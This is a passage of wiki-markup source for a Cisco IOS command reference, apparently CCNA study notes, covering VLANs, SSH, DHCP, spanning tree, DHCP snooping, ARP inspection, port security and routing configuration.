You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
Chart pulled from https://en.wikipedia.org/wiki/Administrative_distance#Default_administrative_distances&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Routing protocol !! Administrative distance&lt;br /&gt;
|-&lt;br /&gt;
| Directly connected interface || 0 (Only the interface itself has an administrative distance of 0, since a route cannot have a distance of less than 1.)&lt;br /&gt;
|-&lt;br /&gt;
| Static route || 1&lt;br /&gt;
|-&lt;br /&gt;
| Dynamic Mobile Network Routing (DMNR) || 3&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP summary route || 5&lt;br /&gt;
|-&lt;br /&gt;
| External BGP || 20&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP internal route || 90&lt;br /&gt;
|-&lt;br /&gt;
| IGRP || 100&lt;br /&gt;
|-&lt;br /&gt;
| Open Shortest Path First (OSPF) || 110&lt;br /&gt;
|-&lt;br /&gt;
| Intermediate System to Intermediate System (IS-IS) || 115&lt;br /&gt;
|-&lt;br /&gt;
| Routing Information Protocol (RIP) || 120&lt;br /&gt;
|-&lt;br /&gt;
| Exterior Gateway Protocol (EGP) || 140&lt;br /&gt;
|-&lt;br /&gt;
| On Demand Routing (ODR) || 160&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP external route || 170&lt;br /&gt;
|-&lt;br /&gt;
| Internal BGP || 200&lt;br /&gt;
|-&lt;br /&gt;
| Next Hop Resolution Protocol (NHRP) || 250&lt;br /&gt;
|-&lt;br /&gt;
| Default static route learned via DHCP || 254&lt;br /&gt;
|-&lt;br /&gt;
| Unknown and unused || 255 (An administrative distance of 255 causes the router to remove the route from the routing table and not use it.)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
